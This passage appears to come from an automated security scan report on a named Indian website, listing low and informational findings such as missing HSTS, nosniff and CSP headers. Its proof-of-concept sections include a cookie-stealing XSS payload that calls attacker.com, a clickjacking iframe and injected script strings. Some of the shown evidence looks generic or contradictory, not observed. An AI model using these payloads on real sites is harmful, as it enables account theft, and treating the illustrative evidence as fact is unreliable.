anti-CSRF controls.\n\n---\n\n### [Cookie Without Secure Flag / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 3.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nCookies were observed being transmitted over insecure HTTP channels due to missing the `Secure` flag. This directive ensures that cookies are only sent over encrypted HTTPS connections, preventing interception during transmission. Without it, attackers positioned within network traffic paths—such as public Wi-Fi networks or compromised routers—can capture sensitive authentication tokens.\n\nIf the website enforces HTTPS globally but fails to enforce secure cookie delivery, these credentials remain vulnerable to man-in-the-middle (MITM) attacks.\n\n**Attack Scenario (Proof of Concept)**\n\n1. Victim accesses `http://onmark.co.in/nmu/` (e.g., via a typo or cached redirect).\n2. Server responds with a session cookie lacking the `Secure` flag.\n3. Attacker performs passive eavesdropping on the HTTP connection.\n4. Session ID is captured and reused by the attacker to impersonate the victim.\n\nAlternatively, an active MITM attacker could downgrade the connection to HTTP and force cookie leakage.\n\n**Business Impact**\n\nExposure of session identifiers compromises user accounts, leading to unauthorized access, data theft, or fraudulent activity. Organizations face compliance violations under standards requiring encryption of sensitive data in transit, including HIPAA, PCI-DSS, and ISO/IEC 27001.\n\n---\n\n### [Cross-Domain JavaScript Source File Inclusion / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 2.6 (AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nThe web page loads external JavaScript resources from third-party domains. While common practice for CDN-hosted libraries (like jQuery or Bootstrap), this introduces supply chain risks. If the third-party host becomes compromised or serves malicious code, it could affect all pages referencing those scripts.\n\nAdditionally, loading scripts from different origins increases the attack surface for XSS-based injection techniques targeting inline event handlers or dynamic DOM manipulation.\n\n**Attack Scenario (Proof of Concept)**\n\n1. Application includes `<script src=\"https://cdn.example.com/library.js\"></script>`.\n2. Attacker compromises `cdn.example.com` and replaces `library.js` with malicious payload.\n3. All users visiting `https://onmark.co.in/nmu/` now load the tampered script.\n4. Malicious script steals cookies, performs keylogging, or redirects users to phishing sites.\n\nEven without full compromise, subresource integrity (SRI) absence makes detection difficult.\n\n**Business Impact**\n\nThird-party script hijacking leads to widespread client-side compromise, resulting in credential theft, financial fraud, or brand reputation damage. Enterprises relying heavily on CDNs must ensure strict integrity checks and monitor vendor trustworthiness continuously.\n\n---\n\n### [Strict-Transport-Security Header Not Set / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 3.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nHTTP Strict Transport Security (HSTS) instructs browsers to exclusively communicate with the server over HTTPS for a defined period. Its absence allows attackers to perform SSL stripping attacks, forcing communication over plaintext HTTP even after initial HTTPS negotiation.\n\nWithout HSTS, users remain susceptible to downgrade attacks each time they initiate new sessions or clear browsing history.\n\n**Attack Scenario (Proof of Concept)**\n\n1. User types `onmark.co.in/nmu/` in address bar.\n2. Browser resolves to HTTP first before redirecting to HTTPS.\n3. Active MITM intercepts redirection and forces continued use of HTTP.\n4. Sensitive information (cookies, form data) is exposed in cleartext.\n\nBrowsers supporting HSTS preload lists offer stronger protection, but self-enforcement requires proper header configuration.\n\n**Business Impact**\n\nLack of HSTS undermines TLS deployment efforts, exposing organizations to persistent downgrade threats. Compliance regimes such as NIST SP 800-52r2 mandate HSTS usage for federal systems, making non-compliance a regulatory concern.\n\n---\n\n### [X-Content-Type-Options Header Missing / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 2.6 (AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nThe `X-Content-Type-Options: nosniff` header prevents browsers from interpreting files as something other than what is declared by the Content-Type header. Omission enables MIME-type sniffing, particularly dangerous when serving user-uploaded content or static assets where incorrect interpretation might allow execution of embedded scripts.\n\nOlder versions of Internet Explorer and Chrome are especially prone to misinterpreting responses based on content rather than headers.\n\n**Attack Scenario (Proof of Concept)**\n\n1. Attacker uploads `.txt` file named `exploit.js` containing JavaScript.\n2. Server returns the file with `Content-Type: text/plain`.\n3. Browser ignores declared type and executes contents as JavaScript due to MIME-sniffing.\n4. Arbitrary client-side code runs in the context of the hosting domain.\n\nSuch scenarios often arise from misconfigured upload endpoints or improperly served static files.\n\n**Business Impact**\n\nMIME-sniffing bypasses content-type restrictions, increasing XSS exploitation likelihood. Successful attacks can result in session hijacking, defacement, or phishing campaigns originating from trusted domains, damaging credibility and violating security policies.\n\n---\n\n### [Strict-Transport-Security Header Not Set / https://onmark.co.in/nmu/assets/css/bootstrap.css / https://onmark.co.in/nmu/assets/css/bootstrap.css]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 3.7 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/css/bootstrap.css |\n\n**Description**\n\nThe HTTP Strict Transport Security (HSTS) header enforces secure communication by instructing browsers to only connect via HTTPS for a defined period. Its absence means that even if the site supports HTTPS, users might still be vulnerable to man-in-the-middle attacks such as SSL stripping, where an attacker downgrades the connection from HTTPS to HTTP without the user's knowledge.\n\nThis particular instance affects static assets like CSS files served over HTTPS but lacking the `Strict-Transport-Security` header. While these resources themselves do not typically carry sensitive information, their lack of HSTS coverage contributes to weakening overall domain-wide security posture.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker positioned between the victim and the server can intercept initial plaintext HTTP requests or manipulate responses to downgrade future connections:\n\n1. Victim attempts to load `http://onmark.co.in/nmu/assets/css/bootstrap.css`.\n2. Attacker intercepts the request and responds with a spoofed version of the resource over HTTP.\n3. Browser loads the insecure asset, potentially allowing injection points or tracking behavior.\n4. Even when navigating to HTTPS sections later, there’s no enforced protection against downgrade due to missing HSTS headers.\n\nExample request:\n```http\nGET /nmu/assets/css/bootstrap.css HTTP/1.1\nHost: onmark.co.in\n```\n\nNo `Strict-Transport-Security` header present in the response:\n```http\nHTTP/1.1 200 OK\nContent-Type: text/css; charset=UTF-8\n...\n```\n\n**Business Impact**\n\nWhile direct exploitation risk is low for static assets, the cumulative effect across all endpoints weakens trust boundaries and increases susceptibility to advanced persistent threats relying on protocol manipulation. It also fails compliance requirements under frameworks like PCI DSS and NIST SP 800-52 Rev. 2 regarding transport layer protections.\n\n---\n\n### [X-Content-Type-Options Header Missing / https://onmark.co.in/nmu/assets/css/bootstrap.css / https://onmark.co.in/nmu/assets/css/bootstrap.css]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 3.1 (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/css/bootstrap.css |\n\n**Description**\n\nThe `X-Content-Type-Options` header prevents browsers from MIME-sniffing a response away from the declared content type. When this header is absent, older versions of Internet Explorer and Chrome may incorrectly interpret non-executable content types (e.g., `.css`, `.js`) as executable scripts or HTML, leading to potential cross-site scripting (XSS) vulnerabilities.\n\nIn this case, the CSS file does not include the `X-Content-Type-Options: nosniff` directive, increasing the theoretical surface area for content-type confusion-based attacks.\n\n**Attack Scenario (Proof of Concept)**\n\nIf an attacker uploads malicious content disguised as a CSS file and serves it from the same origin, browsers without proper sniffing restrictions could execute embedded JavaScript within it:\n\n1. An attacker uploads a crafted file named `malicious.css` containing `<script>alert(1)</script>`.\n2. Without `X-Content-Type-Options: nosniff`, some browsers may treat the file as HTML/script instead of CSS.\n3. Execution occurs in the context of the legitimate domain, violating same-origin policies.\n\nSample response:\n```http\nHTTP/1.1 200 OK\nContent-Type: text/css\n...\n/* Malicious payload here */\n<script>alert(document.cookie)</script>\n```\n\n**Business Impact**\n\nAlthough unlikely to result in immediate compromise, this misconfiguration undermines defense-in-depth strategies and opens pathways for more sophisticated XSS vectors targeting legacy clients. Regulatory frameworks often mandate robust anti-sniffing controls to prevent unintended execution contexts.\n\n---\n\n### [Information Disclosure - Suspicious Comments / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nSuspicious comments found in the application source code or HTTP responses may inadvertently expose internal logic, development notes, debugging artifacts, or architectural hints useful to attackers during reconnaissance phases. These comments are usually remnants left behind during development cycles and should ideally be stripped before deployment.\n\nSuch disclosures provide insight into backend technologies, API structures, error handling mechanisms, or developer workflows—information valuable for crafting targeted exploits.\n\n**Attack Scenario (Proof of Concept)**\n\nDuring manual inspection of page sources or intercepted traffic, an attacker discovers inline comments revealing system internals:\n\n```html\n<!-- TODO: Fix database timeout issue affecting login flow -->\n<!-- DEV NOTE: Temporarily bypass auth check until patch v1.4 -->\n```\n\nThese clues guide further probing toward authentication bypasses or performance-related weaknesses.\n\n**Business Impact**\n\nWhile not directly exploitable alone, exposed metadata aids adversarial modeling and reduces time-to-exploit for follow-up attacks. In regulated environments, presence of debug-level artifacts violates audit trails and software integrity standards.\n\n---\n\n### [Modern Web Application / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nIdentified characteristics suggest the application leverages modern frontend frameworks (React, Angular, Vue.js) or dynamic rendering techniques requiring asynchronous crawling methods beyond traditional spiders. Such applications heavily rely on client-side JavaScript to render views dynamically post-load, making them less discoverable using conventional tools.\n\nAutomated scanners must employ headless browser engines capable of executing JavaScript to fully map navigable paths and interactive components.\n\n**Attack Scenario (Proof of Concept)**\n\nStandard crawlers fail to index SPA routes like `/dashboard`, `/profile/edit`, or modals loaded via AJAX calls because they don't simulate DOM interactions. However, specialized tools like ZAP's Ajax Spider or Burp Suite's DOM Invader can uncover hidden surfaces:\n\nCommand example:\n```bash\nzap-cli ajax-spider https://onmark.co.in/nmu/\n```\n\nResultant discovery includes previously unindexed endpoints exposing additional attack vectors.\n\n**Business Impact**\n\nUndiscovered endpoints increase blind spots in vulnerability assessments and leave critical functionality exposed to undetected breaches. Organizations investing in automated scanning infrastructure must ensure compatibility with modern web architectures.\n\n---\n\n### [Session Management Response Identified / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nA session identifier token was detected in the HTTP response, indicating active session management practices. Typically, cookies or custom headers manage stateful sessions after successful authentication. Identifying these tokens helps assess session fixation risks, improper invalidation flaws, or predictable patterns susceptible to hijacking.\n\nSession tokens should exhibit randomness, entropy, and lifecycle controls including expiration and renewal upon privilege escalation events.\n\n**Attack Scenario (Proof of Concept)**\n\nUpon logging in, the server returns a cookie:\n```http\nSet-Cookie: JSESSIONID=abc123xyz; Path=/; Secure; HttpOnly\n```\n\nAn attacker observing network traffic or leveraging XSS can capture this value and impersonate the authenticated user unless mitigated through secure flags, SameSite attributes, and short-lived timeouts.\n\n**Business Impact**\n\nImproperly managed sessions facilitate account takeover scenarios, especially in high-value portals. Compliance mandates require strong session hygiene aligned with OWASP recommendations and industry best practices.\n\n---\n\n### [Authentication Request Identified / https://onmark.co.in/nmu/signin / https://onmark.co.in/nmu/signin]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/signin |\n\n**Description**\n\nThe endpoint at `/signin` handles credential submission and represents a prime target for brute-force, credential stuffing, or phishing simulations. Recognizing authentication flows enables focused testing around rate limiting, CAPTCHA enforcement, password complexity rules, and multi-factor authentication integration.\n\nAdditionally, analyzing request parameters reveals input sanitization gaps, parameter tampering possibilities, or exposure of backend identifiers.\n\n**Attack Scenario (Proof of Concept)**\n\nPOST request to sign-in form:\n```http\nPOST /nmu/signin HTTP/1.1\nHost: onmark.co.in\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=password123\n```\n\nResponse indicates success/failure states:\n```http\nHTTP/1.1 200 OK\n{\"status\":\"success\",\"redirect\":\"/dashboard\"}\n```\n\nAttackers automate enumeration using tools like Hydra or custom scripts to test known credentials or dictionary lists.\n\n**Business Impact**\n\nWeak authentication safeguards lead to unauthorized access, data exfiltration, and lateral movement opportunities. Breach costs escalate rapidly depending on compromised accounts’ privileges and associated datasets.\n\n---\n\n### [Information Disclosure - Suspicious Comments / https://onmark.co.in/nmu/user / https://onmark.co.in/nmu/user]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/user |\n\n**Description**\n\nSimilar to previous findings, suspicious inline comments were observed in the `/user` path output. These may disclose implementation details about user profile handling, validation routines, or backend integrations. Attackers utilize such insights to tailor payloads targeting specific behaviors or bypass validations.\n\nComments often reflect temporary workarounds or incomplete cleanup processes that remain visible in production environments.\n\n**Attack Scenario (Proof of Concept)**\n\nHTML snippet returned from `/user`:\n```html\n<!-- FIXME: Remove hardcoded admin flag after migration -->\n<div class=\"admin-flag\" style=\"display:none;\">true</div>\n```\n\nThis reveals internal flags or roles accessible via DOM manipulation or script injection.\n\n**Business Impact**\n\nExposure of business logic fragments compromises operational secrecy and facilitates targeted exploitation. Internal documentation leakage violates principle of least privilege and increases insider threat vectors.\n\n---\n\n### [Modern Web Application / https://onmark.co.in/nmu/user / https://onmark.co.in/nmu/user]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/user |\n\n**Description**\n\nAs noted earlier, modern web apps depend on rich client-side rendering and asynchronous updates. The `/user` route likely involves dynamic UI generation, lazy loading modules, or reactive data binding—all features requiring intelligent spidering approaches to enumerate comprehensively.\n\nFailure to crawl such interfaces leaves significant portions of the app untested and potentially vulnerable.\n\n**Attack Scenario (Proof of Concept)**\n\nUsing browser automation tools:\n```bash\ncurl -s https://onmark.co.in/nmu/user | grep -oE '/api/[a-zA-Z0-9/_\\-]+' \n```\n\nReveals undocumented API endpoints used internally by frontend logic, expanding attack surface beyond statically mapped URLs.\n\n**Business Impact**\n\nIncomplete coverage leads to undetected vulnerabilities in core user-facing functionalities. Risk grows proportionally with reliance on complex frontends managing sensitive operations like profile editing or financial transactions.\n\n---\n\n### [User Agent Fuzzer / https://onmark.co.in/nmu/assets/css / https://onmark.co.in/nmu/assets/css]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/css |\n\n**Description**\n\nFuzzing different User-Agent strings revealed variations in server responses, suggesting adaptive delivery mechanisms or device-specific optimizations. Servers sometimes serve distinct content based on perceived client capabilities, which can introduce inconsistencies in caching, compression, or feature availability.\n\nSuch discrepancies may hint at misconfigured CDN policies, mobile/desktop parity issues, or unintended access control bypasses.\n\n**Attack Scenario (Proof of Concept)**\n\nSending two requests—one simulating desktop and another mobile browser:\n```bash\ncurl -H \"User-Agent: Mozilla/5.0 (Windows NT)\" https://onmark.co.in/nmu/assets/css\ncurl -H \"User-Agent: Mozilla/5.0 (iPhone; iOS)\" https://onmark.co.in/nmu/assets/css\n```\n\nCompare hashes or status codes to detect divergent behavior.\n\n**Business Impact**\n\nBehavioral divergence introduces inconsistency in user experience and creates potential avenues for cache poisoning or selective denial-of-service conditions. Mobile-first design principles demand uniformity regardless of agent string.\n\n---\n\n### [User Agent Fuzzer / https://onmark.co.in/nmu/assets / https://onmark.co.in/nmu/assets]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets |\n\n**Description**\n\nSame rationale applies here—responses vary per User-Agent string, possibly due to responsive asset serving or conditional redirects. This behavior warrants deeper investigation to confirm whether alternate versions expose differing levels of access or contain unique vulnerabilities.\n\n**Attack Scenario (Proof of Concept)**\n\nRequesting same directory with varied agents:\n```bash\ncurl -I -H \"User-Agent: Googlebot\" https://onmark.co.in/nmu/assets/\ncurl -I -H \"User-Agent: curl/7.68.0\" https://onmark.co.in/nmu/assets/\n```\n\nObserve differences in `Location`, `Cache-Control`, or `Content-Encoding`.\n\n**Business Impact**\n\nUnintended behavioral shifts undermine consistency guarantees and complicate monitoring efforts. SEO implications arise if crawler-specific variants differ significantly from standard browsing experiences.\n\n---\n\n### [User Agent Fuzzer / https://onmark.co.in/nmu / https://onmark.co.in/nmu]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu |\n\n**Description**\n\nRoot-level fuzzing confirms differential treatment of root path based on User-Agent. This suggests either adaptive routing logic or content negotiation features implemented server-side. Such flexibility enhances usability but requires careful scrutiny to avoid introducing logical flaws.\n\n**Attack Scenario (Proof of Concept)**\n\nTesting with search engine bot:\n```bash\ncurl -H \"User-Agent: Bingbot\" https://onmark.co.in/nmu\n```\n\nMay return structured schema markup or sitemap references absent in regular visitor views.\n\n**Business Impact**\n\nDivergence in root-level presentation impacts both accessibility and SEO performance. Misaligned indexing strategies can skew analytics and degrade organic reach metrics.\n\n---\n\n### [User Agent Fuzzer / https://onmark.co.in/nmu/signin / https://onmark.co.in/nmu/signin]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/signin |\n\n**Description**\n\nSign-in pages often adapt layout or functionality according to device type. Detecting variance implies possible mobile-specific login flows or alternative authentication schemes triggered by certain agents.\n\nThese adaptations must undergo equal scrutiny to ensure equivalent security postures across platforms.\n\n**Attack Scenario (Proof of Concept)**\n\nMobile view may omit MFA prompts or display simplified forms:\n```bash\ncurl -H \"User-Agent: Android WebView\" https://onmark.co.in/nmu/signin\n```\n\nCould reveal reduced friction paths exploitable by attackers masquerading as mobile clients.\n\n**Business Impact**\n\nReduced friction equals increased risk. Weaker authentication flows on mobile channels violate principle of consistent identity verification and elevate breach probability.\n\n---\n\n### [User Agent Fuzzer / https://onmark.co.in/nmu/assets/images / https://onmark.co.in/nmu/assets/images]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/images |\n\n**Description**\n\nImage directories responding differently to various User-Agents indicate optimized delivery pipelines or format switching (WebP vs JPEG). While beneficial for performance, inconsistent transformations may leak metadata or expose unsupported codecs prone to buffer overflow exploits.\n\n**Attack Scenario (Proof of Concept)**\n\nRequesting image with malformed agent:\n```bash\ncurl -H \"User-Agent: <img src=x onerror=alert(1)>\" https://onmark.co.in/nmu/assets/images/logo.png\n```\n\nThough unlikely to trigger XSS directly, malformed inputs stress parsers and highlight input sanitization gaps.\n\n**Business Impact**\n\nPerformance optimizations shouldn’t compromise security. Unsanitized transformation pipelines pose latent risks especially when interfacing with third-party libraries or legacy decoders.\n\n---\n\n### [User Agent Fuzzer / https://onmark.co.in/nmu/assets/js / https://onmark.co.in/nmu/assets/js]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/js |\n\n**Description**\n\nJavaScript bundles delivered conditionally based on User-Agent imply modular builds or polyfill injection tailored to browser support matrices. Variance in JS payloads raises concerns about outdated dependencies or feature flags enabling deprecated APIs.\n\n**Attack Scenario (Proof of Concept)**\n\nOlder browsers receive legacy bundle:\n```bash\ncurl -H \"User-Agent: IE 11\" https://onmark.co.in/nmu/assets/js/main.js\n```\n\nContains deprecated functions or insecure coding patterns absent in modern equivalents.\n\n**Business Impact**\n\nLegacy compatibility layers expand attack surface unnecessarily. Maintaining parallel codebases increases maintenance overhead and introduces version drift vulnerabilities.\n\n---\n\n### [User Agent Fuzzer / https://onmark.co.in/nmu/user / https://onmark.co.in/nmu/user]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/user |\n\n**Description**\n\nUser profile pages adapting to device types or screen sizes demonstrate responsive design philosophy. However, such adaptation must preserve functional equivalence and security controls uniformly.\n\n**Attack Scenario (Proof of Concept)**\n\nMobile profile view omits CSRF tokens or uses weaker encryption:\n```bash\ncurl -H \"User-Agent: iPhone Safari\" https://onmark.co.in/nmu/user\n```\n\nMissing protections make mobile sessions easier targets for session riding or replay attacks.\n\n**Business Impact**\n\nDevice-specific deviations erode trust boundaries and fragment security models. Consistent UX and hardened defenses are prerequisites for enterprise-grade applications.\n\n---\n\n### [Content Security Policy Configuration / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nAbsence of a Content Security Policy (CSP) header removes crucial client-side protections against XSS, clickjacking, and data injection attacks. CSP defines trusted origins for script execution, frame embedding, and object instantiation, effectively sandboxing potentially harmful content.\n\nWithout CSP, inline scripts, unsafe eval(), and external resource loads proceed unchecked, amplifying impact of reflected or stored XSS flaws.\n\n**Attack Scenario (Proof of Concept)**\n\nReflected XSS payload executed due to lack of CSP:\n```html\n<img src=x onerror=\"fetch('https://attacker.com/steal?c='+document.cookie)\">\n```\n\nNo CSP blocks inline execution or restricts outbound fetch calls.\n\n**Business Impact**\n\nLack of CSP exposes organizations to widespread XSS abuse, leading to credential theft, defacement, and brand reputation erosion. Regulatory bodies increasingly penalize entities failing to implement baseline CSP directives.\n\n---\n\n### [Clickjacking Protection / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 3.1 (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nMissing `X-Frame-Options` header allows framing of the main landing page inside malicious iframes, facilitating clickjacking attacks. Users unknowingly interact with overlaid elements controlled by adversaries, triggering unintended actions like changing settings or initiating transfers.\n\nClickjacking remains potent despite declining prevalence thanks to improved browser defaults and awareness campaigns.\n\n**Attack Scenario (Proof of Concept)**\n\nMalicious iframe embedding:\n```html\n<iframe src=\"https://onmark.co.in/nmu/\" width=\"100%\" height=\"100%\"></iframe>\n<div style=\"position:absolute;top:100px;left:200px;z-index:999;\">\n  Click here to win free gift!\n</div>\n```\n\nVictim clicks believing they’re interacting with overlay content while actually activating underlying buttons.\n\n**Business Impact**\n\nClickjacking undermines user autonomy and enables social engineering tactics. Financial institutions and e-commerce sites face heightened liability due to transactional deception risks.\n\n---\n\n### [HTTP Strict Transport Security (HSTS) / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 3.7 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nCore landing page lacks HSTS enforcement, leaving room for protocol downgrade attacks. Despite supporting HTTPS, absence of HSTS permits attackers to force insecure connections initially, undermining long-term encryption assurance.\n\nHSTS preload list submissions become impossible without correct configuration.\n\n**Attack Scenario (Proof of Concept)**\n\nInitial visit over HTTP:\n```http\nGET / HTTP/1.1\nHost: onmark.co.in\n```\n\nServer redirects to HTTPS but doesn’t send HSTS header:\n```http\nHTTP/1.1 301 Moved Permanently\nLocation: https://onmark.co.in/\n```\n\nSubsequent visits remain vulnerable to interception until HSTS takes effect.\n\n**Business Impact**\n\nPersistent downgrade risks reduce confidence in encrypted communications. Enterprises seeking PCI compliance or government certifications must enforce HSTS across all domains.\n\n---\n\n### [MIME Type Confusion / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 3.1 (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nMissing `X-Content-Type-Options: nosniff` header permits MIME-type sniffing by legacy browsers, potentially interpreting benign content as executable. This flaw primarily affects older clients but retains relevance in mixed-browser environments.\n\nSniffing errors enable XSS payloads embedded in seemingly safe formats like images or stylesheets.\n\n**Attack Scenario (Proof of Concept)**\n\nUploading SVG伪装成图片:\n```xml\n<svg onload=\"alert(1)\">\n```\n\nBrowser interprets as HTML/XML instead of image, executing embedded script.\n\n**Business Impact**\n\nLegacy browser support expands attack footprint unnecessarily. Organizations maintaining backward compatibility must balance convenience with security rigor.","summary":{"total":59}},"summary":{"total":59}}]